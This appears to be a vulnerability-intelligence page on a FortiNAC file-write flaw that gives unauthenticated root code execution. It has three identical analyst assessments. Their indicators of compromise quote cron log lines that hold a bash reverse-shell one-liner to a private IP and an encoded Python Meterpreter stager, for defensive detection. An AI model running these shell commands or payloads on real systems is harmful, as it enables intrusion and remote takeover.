A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.

Recent assessments:

jheysel-r7 at March 08, 2023 9:51pm UTC reported:

This vulnerability is an arbitrary file write in the configurationWizard/keyUpload.jsp endpoint. The arbitrary file write results in unauthenticated remote code execution in the context of the root user.

A FortiNAC device provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic responses to a wide range of networking events… Despite these devices not having much of an internet facing footprint, if an attacker already inside your network gains root access to this device it will provide a great starting point to corrode the integrity of the rest of your network. Exploitation is trivial.

IOCs

The original PoC as well as the metasploit module both use the arbitrary file write to drop a cron job (inside /etc/cron.d/) that initiates a reverse shell as the root user.

A target compromised by the original PoC would have a log line in /var/log/cron similar to:

Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)

Whereas a target compromised by the metasploit module, will leave slightly different log lines in /var/log/cron depending on the Meterpreter session returned.

Python Meterpreter:

Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "/tmp/gSYDIjeD", line 1, in <module>)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrdkMIamxrIuVhDxICKCuzeRpU1HLU3TkmS1Kv53N3TxMsN78+bNRzdMo480jKbHKL5t14imDlhqEaLfmyhiNyB5HT2daeeor90bcpXDmmTRfx1iFqqlWS6JF+KIN48397vN9un2+gGSTprROTSRc6YuCqnKlVTFmVRMaK1zSJrGY92TDGeDU0zmaboMFnHi50BstSwl926qTc/Z1R0TQXo0H1wDPOcvpK2O2AL5fO8sUouOt3BpD3btyX/1dKGB4IyGp7tli2YcJo8h8OUFsil1IltMSvHDAluHXyB/G3tfLA==')[0]))))
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "<string>", line 9, in <module>)

Linux Meterpreter:

Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)

Of course, logs and the cron job files themselves can be cleaned up once root access is gained. In addition, there are also different ways to achieve RCE from an arbitrary file write. During testing I was able to drop a .jsp payload in the application webroot, although once triggered it returned a shell in the context of the user running the application and not the root user. Just be aware there could be IOCs outside /var/log/cron

ccondon-r7 at February 23, 2023 5:13pm UTC reported:

This vulnerability is an arbitrary file write in the configurationWizard/keyUpload.jsp endpoint. The arbitrary file write results in unauthenticated remote code execution in the context of the root user.

A FortiNAC device provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic responses to a wide range of networking events… Despite these devices not having much of an internet facing footprint, if an attacker already inside your network gains root access to this device it will provide a great starting point to corrode the integrity of the rest of your network. Exploitation is trivial.

IOCs

The original PoC as well as the metasploit module both use the arbitrary file write to drop a cron job (inside /etc/cron.d/) that initiates a reverse shell as the root user.

A target compromised by the original PoC would have a log line in /var/log/cron similar to:

Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)

Whereas a target compromised by the metasploit module, will leave slightly different log lines in /var/log/cron depending on the Meterpreter session returned.

Python Meterpreter:

Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "/tmp/gSYDIjeD", line 1, in <module>)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrdkMIamxrIuVhDxICKCuzeRpU1HLU3TkmS1Kv53N3TxMsN78+bNRzdMo480jKbHKL5t14imDlhqEaLfmyhiNyB5HT2daeeor90bcpXDmmTRfx1iFqqlWS6JF+KIN48397vN9un2+gGSTprROTSRc6YuCqnKlVTFmVRMaK1zSJrGY92TDGeDU0zmaboMFnHi50BstSwl926qTc/Z1R0TQXo0H1wDPOcvpK2O2AL5fO8sUouOt3BpD3btyX/1dKGB4IyGp7tli2YcJo8h8OUFsil1IltMSvHDAluHXyB/G3tfLA==')[0]))))
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "<string>", line 9, in <module>)

Linux Meterpreter:

Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)

Of course, logs and the cron job files themselves can be cleaned up once root access is gained. In addition, there are also different ways to achieve RCE from an arbitrary file write. During testing I was able to drop a .jsp payload in the application webroot, although once triggered it returned a shell in the context of the user running the application and not the root user. Just be aware there could be IOCs outside /var/log/cron

cbeek-r7 at February 22, 2023 8:57am UTC reported:

This vulnerability is an arbitrary file write in the configurationWizard/keyUpload.jsp endpoint. The arbitrary file write results in unauthenticated remote code execution in the context of the root user.

A FortiNAC device provides protection against IoT threats, extends control to third-party devices, and orchestrates automatic responses to a wide range of networking events… Despite these devices not having much of an internet facing footprint, if an attacker already inside your network gains root access to this device it will provide a great starting point to corrode the integrity of the rest of your network. Exploitation is trivial.

IOCs

The original PoC as well as the metasploit module both use the arbitrary file write to drop a cron job (inside /etc/cron.d/) that initiates a reverse shell as the root user.

A target compromised by the original PoC would have a log line in /var/log/cron similar to:

Mar  8 11:40:01 localhost CROND[17120]: (root) CMD (bash -i >& /dev/tcp/192.168.123.1/4444 0>&1)

Whereas a target compromised by the metasploit module, will leave slightly different log lines in /var/log/cron depending on the Meterpreter session returned.

Python Meterpreter:

Mar  8 15:44:01 localhost CROND[11377]: (root) CMD (python /tmp/gSYDIjeD 0>&1)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (Traceback (most recent call last):)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "/tmp/gSYDIjeD", line 1, in <module>)
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrdkMIamxrIuVhDxICKCuzeRpU1HLU3TkmS1Kv53N3TxMsN78+bNRzdMo480jKbHKL5t14imDlhqEaLfmyhiNyB5HT2daeeor90bcpXDmmTRfx1iFqqlWS6JF+KIN48397vN9un2+gGSTprROTSRc6YuCqnKlVTFmVRMaK1zSJrGY92TDGeDU0zmaboMFnHi50BstSwl926qTc/Z1R0TQXo0H1wDPOcvpK2O2AL5fO8sUouOt3BpD3btyX/1dKGB4IyGp7tli2YcJo8h8OUFsil1IltMSvHDAluHXyB/G3tfLA==')[0]))))
Mar  8 15:44:03 localhost CROND[8878]: (root) CMDOUT (  File "<string>", line 9, in <module>)

Linux Meterpreter:

Mar  8 15:46:01 localhost CROND[11595]: (root) CMD (chmod +x /tmp/vprwoPAh && /tmp/vprwoPAh 0>&1)

Of course, logs and the cron job files themselves can be cleaned up once root access is gained. In addition, there are also different ways to achieve RCE from an arbitrary file write. During testing I was able to drop a .jsp payload in the application webroot, although once triggered it returned a shell in the context of the user running the application and not the root user. Just be aware there could be IOCs outside /var/log/cron

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5